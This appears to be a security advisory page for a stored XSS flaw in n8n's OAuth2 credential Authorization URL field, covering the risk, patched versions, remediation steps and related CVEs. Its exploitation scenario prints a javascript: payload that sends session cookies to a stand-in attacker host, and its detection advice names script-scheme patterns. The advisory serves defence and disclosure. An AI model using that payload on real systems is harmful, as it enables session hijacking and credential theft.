GHSA-364x-8g5j-x2pr: n8n: stored XSS via malicious OAuth2 Authorization URL
GHSA-364x-8g5j-x2pr MEDIUMAny organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.
What is the risk?
Nominal CVSS 5.4 (medium) understates real-world risk in AI-heavy environments. n8n instances typically hold credentials for dozens of upstream services—LLM APIs, vector databases, data warehouses—making session takeover disproportionately damaging. Exploitability is trivial once the attacker has any credential-creation permission; no AI/ML knowledge required. Insider threat and credential-sharing abuse patterns are realistic vectors. Organizations with large n8n deployments shared across teams face the highest exposure.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | >= 2.7.0, < 2.8.0 | 2.8.0 |
Do you use n8n? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
PATCH
Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field.
-
AUDIT
Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials.
-
RESTRICT
Tighten credential creation and sharing permissions to the minimum necessary set of users until patched.
-
DETECT
Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints.
-
SCOPE
Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-364x-8g5j-x2pr?
Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.
Is GHSA-364x-8g5j-x2pr actively exploited?
No confirmed active exploitation of GHSA-364x-8g5j-x2pr has been reported, but organizations should still patch proactively.
How to fix GHSA-364x-8g5j-x2pr?
1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field. 2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials. 3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched. 4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints. 5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.
What systems are affected by GHSA-364x-8g5j-x2pr?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI automation pipelines, workflow orchestration, LLM API integration layers.
What is the CVSS score for GHSA-364x-8g5j-x2pr?
GHSA-364x-8g5j-x2pr has a CVSS v3.1 base score of 5.4 (MEDIUM).
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0011.003 Malicious Link AML.T0012 Valid Accounts AML.T0049 Exploit Public-Facing Application AML.T0053 AI Agent Tool Invocation AML.T0055 Unsecured Credentials AML.T0081 Modify AI Agent Configuration AML.T0083 Credentials from AI Agent Configuration Compliance Controls Affected
What are the technical details?
Original Advisory
## Impact An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session. ## Patches The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit credential creation and sharing permissions to fully trusted users only. - Restrict access to the n8n instance to trusted users only. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A disgruntled team member or attacker who has compromised a low-privilege n8n account (e.g., a developer account) creates an OAuth2 credential named something innocuous like 'Slack Integration (Prod)'. In the Authorization URL field they inject: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session, exfiltrating session cookies to the attacker's C2. The attacker replays the session token, gaining full admin access to n8n and all stored credentials—including OpenAI API keys, database connection strings, and downstream service tokens.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N References
Timeline
Related Vulnerabilities
CVE-2026-33663 10.0 n8n: member role steals plaintext HTTP credentials
Same package: n8n CVE-2026-33660 10.0 TensorFlow: type confusion NPD in tensor conversion
Same package: n8n CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same package: n8n CVE-2026-27577 9.9 n8n: Code Injection enables RCE
Same package: n8n CVE-2026-27494 9.9 n8n: security flaw enables exploitation
Same package: n8n